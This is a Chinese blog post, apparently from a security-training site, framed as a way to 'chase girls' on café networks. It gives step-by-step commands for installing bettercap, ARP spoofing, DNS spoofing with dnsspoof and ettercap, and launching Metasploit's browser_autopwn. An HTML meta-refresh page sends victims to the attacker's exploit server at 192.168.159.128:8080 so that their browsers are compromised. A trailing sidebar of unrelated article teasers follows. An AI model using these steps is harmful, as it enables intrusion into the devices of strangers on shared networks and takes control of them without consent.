文档章节

【技术追妹学问】内网世界的王者

i春秋学院
 i春秋学院
发布于 2017/01/04 16:40
字数 1351
阅读 27
收藏 0

各位小司机你们好吗,记以前出过一个系列如何在咖啡厅等局域网场合内轻松泡到妹子后.本司机收到了好多小司机的反应说教程好可以,然而最近好无聊好无聊,本司机又想去那个啥了,然后给你们写了下列文章。

 

今天用到的三款大家熟悉的工具,bettercap,ettercap,MSF。这三款工具。【个人喜欢用ettercat不过ettercap很成功,但在新时代下它已经老了 ettercap的过滤器复杂,使用门槛高,在大型网络下,主机发现功能效果很差.优化不够,对研究人员来说,无用的功能太多 ,扩展性不够,开发需要掌握C/C++语言 所以我们要逐渐的放弃ettercap 不过还是有喜欢用的朋友,我会做两个版本的相关文章给大家演示的。

安装:

git clone [url]https://github.com/evilsocket/bettercap[/url]

cd bettercap

gem build bettercap.gemspec

sudo gem install bettercap*.gem


如果报错,如图:

执行如下命令:

sudo apt-get install ruby-dev libpcap-dev

sudo gem install bettercap*.gem



成功安装,下面是搜集的参数。

-I, –interface IFACE 指定Network interface name,默认eth0


-S, –spoofer NAME 指定欺骗模块,此参数默认为ARP,目前仅支持ARP,新版本会添加更多选项


-T, –target ADDRESS 指定单一ip,如果未设置,则代表所有子网,子网所有主机自动扫描,简单高效,十分推荐

-O, –log LOG_FILE 日志功能


-D, –debug 调试功能,会将每一步操作详细记录,便于调试


-L, –local 解析流经本机的所有数据包(此操作会开启嗅探器),此参数默认为关闭


-X, –sniffer 开启嗅探器. –sniffer-pcap FILE 将数据包保存为PCAP文件,可用Wireshark打开(此操作会开启嗅探器) –sniffer-filter EXPRESSION 配置嗅探器使用BPF过滤器(此操作会开启嗅探器)


-P, –parsers PARSERS 指定数据包(此操作会开启嗅探器),支持NTLMSS, IRC, POST, URL, FTP, HTTPS, HTTPAUTH, MAIL,此参数默认为所有 –no-discovery 只使用当前的ARP缓存,不去扫描其他主机,此参数默认为关闭 –no-spoofing 关闭欺骗模块,也可以使用参数–spoofer NONE代替 –proxy 启用HTTP代理并且重定向所有HTTP请求至本机,此参数默认为关闭 –proxy-port PORT 设置HTTP代理端口,此参数默认为8080 –proxy-module MODULE 指定加载的Ruby模块 –httpd 开启HTTP服务器,此参数默认为关闭 –httpd-port PORT 指定HTTP server port, 此参数默认为8081. –httpd-path PATH 指定HTTP server path,此参数默认为 ./.


-h, –help 英文帮助


然而ettercap系统自带的所以不用掩饰。
首先我们要开启

service postgresql start


打开MSF

我们利用的是Browser_autopwn模块这是一个自动攻击浏览器的模块。它会自动感应攻击目标的浏览器并且对它发动适当的攻击。
命令:

use server/browser_autopwn

我们来设置我们的IP
命令:

set uripath /

命令:

set LHOST (你的IP地址)


运行命令:

run



然后他会自动加载所以模块,加载好的样子。

我们执行arp攻击

bettercap -X



我们要创建一个dns欺骗的页面需要转到我们的那个端口。
打开我们KALI index.html
 

/var/www/html/index.html
<html>

        <head>

        <title>ichunqiu.com</title>

        <meta http-equiv="refresh" content="0;url=http://192.168.159.128:8080/">

                <body>

                        <p>i am ichunqiu.com</p>

                        <p>ichunqiu.com</p>

                </body>

        </head>

</html>



然后我们开启apache2

etc/init.d/apache2 start



开始dns欺骗:

dnsspoof -f /var/www/html/index.html


下面的情况可想而知....打开的页面会跳转到http://192.168.159.128:8080/然后进行模块的匹配达到上线的目的。
ettercap文章我拿以前我写的给大家看思路都是一样的.
 

首先我们要修改一下ettercap里面的DNS劫持文件的数据修改成所有网站都替换成我们的DNS.

在对应的位置添加对应的 标识和IP地址  * 代表所有域名 后边就是你要欺骗为的IP地址,这里是当然是我自己的主机IP地址啦然后记得保存。

然后再来搭建一个web页面  
编辑/var/www/html/index.html文件  
改成你定义页面 这里我简单的写了一个html的主页。

我们在终端下打开ettercap的图像化界面!

输入命令:ettercap -G

 

 

弹出来一个图形化界面,我们首先需要点击Sniff 然后选择Unified sniffng 。

 

它会弹出让我们选择网卡,上节课我们介绍过了如何查找自己的网卡设备我就不再介绍了 然后我们确定。

我们扫描一下我们的局域网内的主机 我们也可以用快捷方式来进行操作 Ctrl+s 可以快速扫描。

 

 

扫描完成以后我们打开扫描好的自己信息也可以Ctrl+h打开。

我们把网关添加到Add to Target 1 右键添加Add to Target 2 添加攻击IP

 

这是添加好的样子。

 

然后点mitm --- arp posoning ,勾选sniff remote connections:

然后我们在选择 plugins  然后选择第一个选项 也可以用快捷方式Ctrl+p

 

进行欺骗DNS!

之后start --- start sniffing开始监听 然后欺骗成功!!!!

更多安全技术、精品好文、白帽黑客大佬尽在:http://bbs.ichunqiu.com/portal.php

© 著作权归作者所有

共有 人打赏支持
i春秋学院
粉丝 16
博文 105
码字总数 159006
作品 0
海淀
私信 提问
GrowingIO 2016 数据驱动增长大会

GrowingIO 2016 数据驱动增长大会,首次聚齐了增长黑客之父 Sean Ellis 、世界前十位前沿数据科学家张溪梦等数十位中美顶尖增长实践者; 链家、点融网、Camera360、量化派、北森以及猎上等国...

活动家
2016/12/10
0
0
BOE(京东方)董事长王东升:创新是企业发展的唯一路径

  创新是我们活下来的法宝,也是唯一路径。   12月23日,BOE(京东方)董事长王东升应邀参加“2017-2018中国经济年会”论坛,分享了京东方的发展历程,深刻阐述科技创新对企业发展的重要...

镁客网
2017/12/26
0
0
暴走主编王尼玛受到非法监控和威胁,目前抑郁严重有自杀倾向

关注暴漫的网友都知道,2017年10月27日起,《暴走大事件》连续停更,到11月17日,《暴走大事件》的视频全网下架,网传的原因是涉及敏感时事内容。 11月15日,微博账号王尼玛回应是:由于部分...

拉米拉科技
2017/12/22
0
0
“九评王者荣耀”,是电子游戏“主流化”的信号

1 不到1个月的时间里,人民网、新华社两大国家级媒体连续发文批判“王者荣耀”,炮火集中在“历史背景”和“防沉迷”两个落点上,足以推论这是一次有计划、有组织的舆论“声讨”。 很容易把这...

刘晨
2017/07/13
0
0
数据解析王者荣耀直播现状,斗鱼、虎牙、触手三大平台领跑行业!

作为当前最火热的手机类MOBA游戏——王者荣耀2015年11月26日推出公测版,2016年9月启动王者荣耀职业联赛。我们将用数据为各位读者解读这款游戏直播现状。 本文所用数据均来自于:直播观察网 ...

直播观察
2017/05/18
0
0

没有更多内容

加载失败,请刷新页面

加载更多

Linux iptables之mangle表使用案例

mangle表的用途 mangle表的主要功能是根据规则修改数据包的一些标志位,以便其他规则或程序可以利用这种标志对数据包进行过滤或策略路由。 mangel表使用示例 示例1-策略路由1 内网的客户机通...

月下狼
36分钟前
2
0
OSChina 周日乱弹 —— 兼职我想去学学布偶戏

Osc乱弹歌单(2019)请戳(这里) 【今日歌曲】 @clouddyy : 《火炎 - 女王蜂》 《火炎 - 女王蜂》 手机党少年们想听歌,请使劲儿戳(这里) @小鱼丁 :还在睡觉突然接到一个小哥哥电话“x...

小小编辑
49分钟前
46
3
租房软件隐私保护如同虚设

近日,苏州市民赵先生向江苏新闻广播新闻热线025-84658888反映,他在“安居客”手机应用软件上浏览二手房信息,并且使用该软件自动生成的虚拟号码向当地一家中介公司进行咨询。可电话刚挂不久...

linux-tao
今天
3
0
分布式项目(五)iot-pgsql

书接上回,在Mapping server中,我们已经把数据都整理好了,现在利用postgresql存储历史数据。 iot-pgsql 构建iot-pgsql模块,这里我们写数据库为了性能考虑不在使用mybatis,换成spring jd...

lelinked
今天
6
0
一文分析java基础面试题中易出错考点

前言 这篇文章主要针对的是笔试题中出现的通过查看代码执行结果选择正确答案题材。 正式进入题目内容: 1、(单选题)下面代码的输出结果是什么? public class Base { private Strin...

一看就喷亏的小猿
今天
2
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部